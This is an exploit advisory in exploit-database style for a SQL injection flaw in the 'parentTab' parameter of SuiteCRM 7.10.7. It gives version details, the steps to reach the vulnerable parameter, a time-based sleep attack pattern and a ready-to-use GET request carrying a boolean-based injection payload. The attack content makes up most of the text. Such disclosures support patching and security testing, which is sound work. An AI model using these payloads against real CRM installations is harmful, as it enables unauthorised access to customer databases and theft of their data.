##################################################################### Exploit Title: SuiteCRM 7.10.7 - 'parentTab' SQL Vulnerabilities# Dork: N/A# Date: 03-02-2019# Exploit Author: Mehmet EMIROGLU# Vendor Homepage: https://suitecrm.com/# Software Link: https://suitecrm.com/download/# Version: 7.10.7# Category: Webapps# Tested on: Wampp @Win# CVE: N/A# Software Description: SuiteCRM was awarded the 2015 BOSSIE by InfoWorldas the world's best open source Customer Relationship Management (CRM)
application.##################################################################### Vulnerabilities# This web application called as SuiteCRM 7.10.7 version.# After logging in, enter the email section.
then change the collaboration to 9999999(This bypass Method). Add the
following codes to the end of the URL.##################################################################### POC - SQL (Boolean Based)# Parameters : parentTab# Attack Pattern : aNd if(length(0x454d49524f474c55)>1,sleep(5),0)# Refer Adress:
http://localhost/SuiteCRM/index.php?module=Emails&action=index&parentTab=Collaboration
# GET Request :
http://localhost/SuiteCRM/index.php?module=Emails&action=index&parentTab=99999999%27)/**/oR/**/6617279=6617279/**/aNd/**/(%276199%27)=(%276199####################################################################
